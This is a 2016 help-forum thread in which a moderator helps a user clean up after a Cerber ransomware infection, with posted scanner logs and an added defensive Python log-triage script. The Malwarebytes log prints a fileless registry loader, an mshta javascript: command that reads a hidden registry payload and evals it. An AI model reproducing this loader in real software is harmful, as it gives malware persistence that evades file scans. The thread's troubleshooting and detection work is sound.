
Topic: Infected by cerber virus (Read 7145 times)


IPDO (Topic Starter)
Infected by cerber virus
« on: July 12, 2016, 11:02:50 PM »
Hi,

My notebook got infected by a Cerber virus: I saw a lot of files on my desktop saying "decrypt my files", and I did some research and found that it is the Cerber ransomware. It has also encrypted my files and I don't know how to decrypt them and restore them.

HP Envy 15-ae008TX
Windows 10 64-bit

Allan (Moderator)
Re: Infected by cerber virus
« Reply #1 on: July 13, 2016, 05:16:26 AM »
Please follow the instructions in the following link and post your logs:
http://www.computerhope.com/forum/index.php/topic,46313.0.html

IPDO (Topic Starter)
Re: Infected by cerber virus
« Reply #2 on: July 20, 2016, 04:26:32 AM »
All the required logs are uploaded.

# AdwCleaner v5.201 - Logfile created 20/07/2016 at 15:20:46
# Updated 30/06/2016 by ToolsLib
# Database : 2016-07-19.2 [Server]
# Operating system : Windows 10 Home Single Language  (X64)
# Username : Rehan - ADMIN
# Running from : C:\Users\Rehan\Downloads\adwcleaner_5.201.exe
# Option : Scan
# Support : https://toolslib.net/forum

***** [ Services ] *****


***** [ Folders ] *****


***** [ Files ] *****


***** [ DLL ] *****


***** [ WMI ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****


***** [ Registry ] *****


***** [ Web browsers ] *****


*************************

C:\AdwCleaner\AdwCleaner[S1].txt - [641 bytes] - [20/07/2016 15:20:46]

########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [713 bytes] ##########


<?xml version="1.0" encoding="UTF-16" ?>
<mbam-log>
<header>
<date>2016/07/20 15:30:37 +0530</date>
<logfile>mbam-log-2016-07-20 (15-30-03).xml</logfile>
<isadmin>yes</isadmin>
</header>
<engine>
<version>2.2.1.1043</version>
<malware-database>v2016.07.20.06</malware-database>
<rootkit-database>v2016.05.27.01</rootkit-database>
<license>trial</license>
<file-protection>enabled</file-protection>
<web-protection>enabled</web-protection>
<self-protection>disabled</self-protection>
</engine>
<system>
<hostname>ADMIN</hostname>
<ip>192.168.43.143</ip>
<osversion>Windows 10</osversion>
<arch>x64</arch>
<username>Rehan</username>
<filesys>NTFS</filesys>
</system>
<summary>
<type>threat</type>
<result>completed</result>
<objects>304475</objects>
<time>407</time>
<processes>0</processes>
<modules>0</modules>
<keys>3</keys>
<values>1</values>
<datas>0</datas>
<folders>5</folders>
<files>20</files>
<sectors>0</sectors>
</summary>
<options>
<memory>enabled</memory>
<startup>enabled</startup>
<filesystem>enabled</filesystem>
<archives>enabled</archives>
<rootkits>disabled</rootkits>
<deeprootkit>disabled</deeprootkit>
<heuristics>enabled</heuristics>
<pup>enabled</pup>
<pum>enabled</pum>
</options>
<items>
<key><path>HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SppExtComObj.exe</path><vendor>HackTool.AutoKMS</vendor><action>success</action><hash>6cda33f3bae0e6508919e40cd130d22e</hash></key>
<key><path>HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SppExtComObj.exe</path><vendor>HackTool.AutoKMS</vendor><action>success</action><hash>6cda33f3bae0e6508919e40cd130d22e</hash></key>
<key><path>HKU\S-1-5-21-3402600939-4254193186-2331665615-1001_Classes\651043\SHELL\OPEN\COMMAND</path><vendor>Rootkit.Fileless.MTGen</vendor><action>success</action><hash>5de9f1356d2d7eb85fe304fa937040c0</hash></key>
<value><path>HKU\S-1-5-21-3402600939-4254193186-2331665615-1001_Classes\651043\SHELL\OPEN\COMMAND</path><valuename></valuename><vendor>Rootkit.Fileless.MTGen</vendor><action>success</action><valuedata>&quot;C:\WINDOWS\system32\mshta.exe&quot; &quot;javascript:rdu1J2TsG=&quot;BhKjwT&quot;;t0v5=new ActiveXObject(&quot;WScript.Shell&quot;);vxW3Z=&quot;cGqCgT6&quot;;noQ0D6=t0v5.RegRead(&quot;HKCU\\software\\yqsgon\\hdfdvz&quot;);uV8eDSk1=&quot;neCgvCgP&quot;;eval(noQ0D6);y3VwqzhN=&quot;bSoPcA&quot;;&quot;</valuedata><hash>5de9f1356d2d7eb85fe304fa937040c0</hash></value>
<folder><path>C:\ProgramData\Microsoft\Performance\Monitor</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></folder>
<folder><path>C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></folder>
<folder><path>C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></folder>
<folder><path>C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></folder>
<folder><path>C:\ProgramData\Microsoft\Performance\Monitor\temp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></folder>
<file><path>C:\Program Files (x86)\Cities XXL\steam_api.dll</path><vendor>RiskWare.GameHack</vendor><action>success</action><hash>4afc022406941a1cb2ba52566b9926da</hash></file>
<file><path>C:\Windows\System32\SppExtComObjPatcher.exe</path><vendor>HackTool.AutoKMS</vendor><action>success</action><hash>6cda33f3bae0e6508919e40cd130d22e</hash></file>
<file><path>C:\Users\Rehan\AppData\Local\Temp\ICReinstall_WinRAR_Setup.exe</path><vendor>PUP.Optional.InstallCore</vendor><action>success</action><hash>f94d0b1b2f6bf6402859084b2cd4fd03</hash></file>
<file><path>C:\Users\Rehan\AppData\Local\Temp\ins9D39.tmp</path><vendor>Trojan.Sathurbot</vendor><action>success</action><hash>af979294900ab77fa481c4f130d443bd</hash></file>
<file><path>C:\Users\Rehan\AppData\Local\Temp\Temp2_WinRAR_Setup.zip\WinRAR_Setup.exe</path><vendor>PUP.Optional.InstallCore</vendor><action>success</action><hash>58ee81a5990134020879ec67ea163ac6</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\zepplauncher.mif</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp3BF8.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp6CCB.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp6E74.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp7709.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp8388.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp8A9C.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpA089.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpB630.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpE20B.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpF22C.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\{3E68883A-E05B-8A20-EE6E-AA5BF6EE8ED7}</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\{68E037CE-7737-AC9B-1D5A-84BC1EAA7F3E}</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\{BA281C97-4445-CB4F-B3EE-177BB951AD13}</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\{FCAD63A7-4785-E81C-0BEC-612D62B3C8C8}</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
</items>
</mbam-log>


Results of screen317's Security Check version 1.014 --- 12/23/15
 x64 (UAC is enabled)
 Internet Explorer 11
``````````````Antivirus/Firewall Check:``````````````
 Windows Firewall Enabled!
Windows Defender
McAfee Anti-Virus and Anti-Spyware
 WMI entry may not exist for antivirus; attempting automatic update.
`````````Anti-malware/Other Utilities Check:`````````
 Google Chrome (51.0.2704.103)
 Google Chrome (51.0.2704.84)
 Google Chrome (SetupMetrics.pma..)
````````Process Check: objlist.exe by Laurent````````
 Malwarebytes Anti-Malware mbamservice.exe
 Malwarebytes Anti-Malware mbam.exe
 Malwarebytes Anti-Malware mbamscheduler.exe
`````````````````System Health check`````````````````
 Total Fragmentation on Drive C:  %
````````````````````End of Log``````````````````````


[attachment deleted by admin to conserve space]
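The Malwarebytes log above deserves a closer look than its tidy "success" column suggests: the Rootkit.Fileless.MTGen entries are a shell\open\command value that launches mshta.exe with an inline javascript: URL, which reads its real script out of another registry value and eval()s it, so that stage never exists as a file for an on-disk scan to quarantine. The following is an added example, not code from the thread or from Malwarebytes: a small Python triage script that parses the mbam-log XML layout and flags such values; the excerpt it parses is constructed to mirror the posted log, with a placeholder SID and a placeholder payload key.

```python
import re
import xml.etree.ElementTree as ET
from collections import Counter

# Constructed excerpt in the layout of the Malwarebytes 2.x XML log posted above
# (SID and payload key are placeholders). A real mbam-log-*.xml is UTF-16; read
# it with encoding="utf-16" and pass the decoded str to parse_mbam_log().
SAMPLE_LOG = r"""<?xml version="1.0" encoding="UTF-16" ?>
<mbam-log>
<summary><type>threat</type><result>completed</result></summary>
<items>
<key><path>HKU\S-1-5-21-PLACEHOLDER-1001_Classes\651043\SHELL\OPEN\COMMAND</path><vendor>Rootkit.Fileless.MTGen</vendor><action>success</action></key>
<value><path>HKU\S-1-5-21-PLACEHOLDER-1001_Classes\651043\SHELL\OPEN\COMMAND</path><valuename></valuename><vendor>Rootkit.Fileless.MTGen</vendor><action>success</action><valuedata>&quot;C:\WINDOWS\system32\mshta.exe&quot; &quot;javascript:s=new ActiveXObject(&quot;WScript.Shell&quot;);p=s.RegRead(&quot;HKCU\\software\\example\\payload&quot;);eval(p);&quot;</valuedata></value>
<file><path>C:\Windows\System32\SppExtComObjPatcher.exe</path><vendor>HackTool.AutoKMS</vendor><action>success</action></file>
</items>
</mbam-log>"""

XML_DECL = re.compile(r"^\s*<\?xml[^>]*\?>")

# Traits of the loader in this thread's log: a script host handed an inline
# javascript: URL that reads its payload out of a registry value and eval()s
# it, so no script file ever exists for an on-disk scanner to quarantine.
FILELESS_TRAITS = {
    "script_host": re.compile(r"\b(mshta|wscript|cscript)\.exe\b", re.I),
    "inline_js": re.compile(r"javascript:", re.I),
    "reg_payload": re.compile(r"\.RegRead\s*\(", re.I),
    "eval": re.compile(r"\beval\s*\(", re.I),
}
FIELDS = ("path", "vendor", "action", "valuedata")

def parse_mbam_log(text):
    """One dict per detected item under <items> (key, value, folder or file)."""
    # The declaration is dropped because the text is already decoded.
    root = ET.fromstring(XML_DECL.sub("", text, count=1))
    items = root.find("items")
    return [dict(kind=node.tag, **{f: node.findtext(f, "") for f in FIELDS})
            for node in (items if items is not None else [])]

def fileless_traits(valuedata):
    """Names of the fileless-loader traits found in a registry value's data."""
    return [name for name, rx in FILELESS_TRAITS.items() if rx.search(valuedata or "")]

def triage(items):
    """Detections per family, plus registry values that look like a fileless
    loader; those outrank leftover temp files because the persistence survives
    a reboot and leaves nothing on disk for a file scan to find."""
    by_vendor = Counter(item["vendor"] for item in items)
    loaders = []
    for item in items:
        traits = fileless_traits(item["valuedata"]) if item["kind"] == "value" else []
        if "script_host" in traits and {"reg_payload", "eval"} & set(traits):
            loaders.append({"path": item["path"], "traits": traits})
    return by_vendor, loaders
```

Run triage(parse_mbam_log(open(path, encoding="utf-16").read())) on a real log; a non-empty loaders list means the registry key, not just the temp files, has to be cleaned before the machine is considered clear.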

SuperDave (Malware Removal Specialist, Moderator)
Re: Infected by cerber virus
« Reply #3 on: July 20, 2016, 01:19:49 PM »
Hello and welcome to Computer Hope Forum. My name is Dave. I will be helping you out with your particular problem on your computer.

1. I will be working on your Malware issues. This may or may not solve other issues you have with your machine.
2. The fixes are specific to your problem and should only be used for this issue on this machine.
3. If you don't know or understand something, please don't hesitate to ask.
4. Please DO NOT run any other tools or scans while I am helping you.
5. It is important that you reply to this thread. Do not start a new topic.
6. Your security programs may give warnings for some of the tools I will ask you to use. Be assured, any links I give are safe.
7. Absence of symptoms does not mean that everything is clear.

If you can't access the internet with your infected computer you will have to download and transfer any programs to the computer you're using now and transfer them to the infected computer with a CD-RW or a USB storage device. I prefer a CD because a storage device can get infected. If you use a storage device hold the shift key down while inserting the USB storage device for about 10 secs. You will also have to transfer the logs you receive back to the good computer using the same method until we can get the computer back on-line.
*************************************************************************
Please run AdwCleaner again and hit the delete button and post the log.
*********************************************
Please download Malwarebytes Anti-Malware from here.
Double Click mbam-setup.exe to install the application.
  • It should update automatically if the computer is connected to the internet.
  • Click on Threat Scan and click on Scan Now.
  • The scan may take some time to finish, so please be patient.
  • When the scan is complete make sure all the infections have "quarantine" selected in the Action box.
  • Click on "Apply actions". You may be asked to restart your computer to completely remove the infections.
  • When disinfection is completed you can click on "Copy to Clipboard".
  • Paste the log in your next reply (CTRL+V).
*************************************************
Please download Junkware Removal Tool to your desktop.

Warning! Once the scan is complete JRT will shut down your browser with NO warning.

Shut down your protection software now to avoid potential conflicts.

• Temporarily disable your Antivirus and any Antispyware real time protection before performing a scan. Click this link to see a list of security programs that should be disabled and how to disable them.

• Run the tool by double-clicking it. If you are using Windows Vista or Windows 7, right-click JRT and select Run as Administrator.

• The tool will open and start scanning your system.

• Please be patient as this can take a while to complete depending on your system's specifications.

• On completion, a log (JRT.txt) is saved to your desktop and will automatically open.

• Copy and Paste the JRT.txt log into your next message.
****************************************************
I'm not sure if this will run on your notebook but give it a try.

Download Security Check by screen317 from one of the following links and save it to your desktop.

Security Check

* Double-click Security Check.bat
* Follow the on-screen instructions inside of the black box.
* A Notepad document should open automatically called checkup.txt
* Post the contents of that document in your next reply.

Note: If a security program requests permission from dig.exe to access the Internet, allow it to do so.
Windows 8 and Windows 10 dual boot with two SSD's

IPDO (Topic Starter)
Re: Infected by cerber virus
« Reply #4 on: July 20, 2016, 11:50:03 PM »
All the files are uploaded.

[attachment deleted by admin to conserve space]

SuperDave (Malware Removal Specialist, Moderator)
Re: Infected by cerber virus
« Reply #5 on: July 21, 2016, 01:13:51 PM »
Please do not attach your logs unless absolutely necessary. Copy and paste them in your reply(ies).

I'd like to scan your machine with ESET OnlineScan

• Hold down Control and click on the following link to open ESET OnlineScan in a new window.
ESET OnlineScan

• Click the button.
• For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
  • Click on to download the ESET Smart Installer. Save it to your desktop.
  • Double click on the icon on your desktop.
• Check
• Click the button.
• Accept any security warnings from your browser.
  • Leave the check mark next to Remove found threats.
• Check
• Push the Start button.
• ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
• When the scan completes, push
• Push , and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
• Push the button.
• Push
A log file will be saved here: C:\Program Files\ESET\ESET Online Scanner\log.txt

IPDO (Topic Starter)
Re: Infected by cerber virus
« Reply #6 on: July 22, 2016, 03:45:03 AM »
ESET hangs after 3 hours of scanning.

SuperDave (Malware Removal Specialist, Moderator)
Re: Infected by cerber virus
« Reply #7 on: July 22, 2016, 12:05:56 PM »
I see. Let's try another.
Please go to Kaspersky website and perform an online antivirus scan.


1. Read through the requirements and privacy statement and click on Accept button.
2. It will start downloading and installing the scanner and virus definitions. You will be prompted to install an application from Kaspersky. Click Run.
3. When the downloads have finished, click on Settings.
4. Make sure these boxes are checked (ticked). If they are not, please tick them and click on the Save button:
Spyware, Adware, Dialers, and other potentially dangerous programs
Archives


5. Click on My Computer under Scan.
6. Once the scan is complete, it will display the results. Click on View Scan Report.
7. You will see a list of infected items there. Click on Save Report As....
8. Save this report to a convenient place. Change the Files of type to Text file (.txt) before clicking on the Save button.
9. Please post this log in your next reply.

IPDO (Topic Starter)
Re: Infected by cerber virus
« Reply #8 on: July 23, 2016, 02:27:07 AM »
Check boxes not present in Settings for "Spyware, Adware, Dialers, and other potentially dangerous programs" or "Archives".
Save Report As option not available.

SuperDave (Malware Removal Specialist, Moderator)
Re: Infected by cerber virus
« Reply #9 on: July 23, 2016, 01:12:11 PM »
What's the status of your computer now?

IPDO (Topic Starter)
Re: Infected by cerber virus
« Reply #10 on: July 24, 2016, 12:26:55 AM »
Kaspersky detects no viruses or malware etc. Computer is running "ok". According to a Cerber profile I read from one of the antivirus sources, it deletes itself after encrypting the files. Now the problem is how to decrypt those files?

SuperDave (Malware Removal Specialist, Moderator)
Re: Infected by cerber virus
« Reply #11 on: July 24, 2016, 12:55:45 PM »
I'm afraid I can't help much with encrypted files. You can try doing some searches on-line but I wouldn't hold out too much hope. That's why back-ups are so important.

Here is some more information about encrypted files. Caution: Do not download any programs from this link. I cannot vouch for their effectiveness and security.
You might want to try some of these file recovery programs listed here.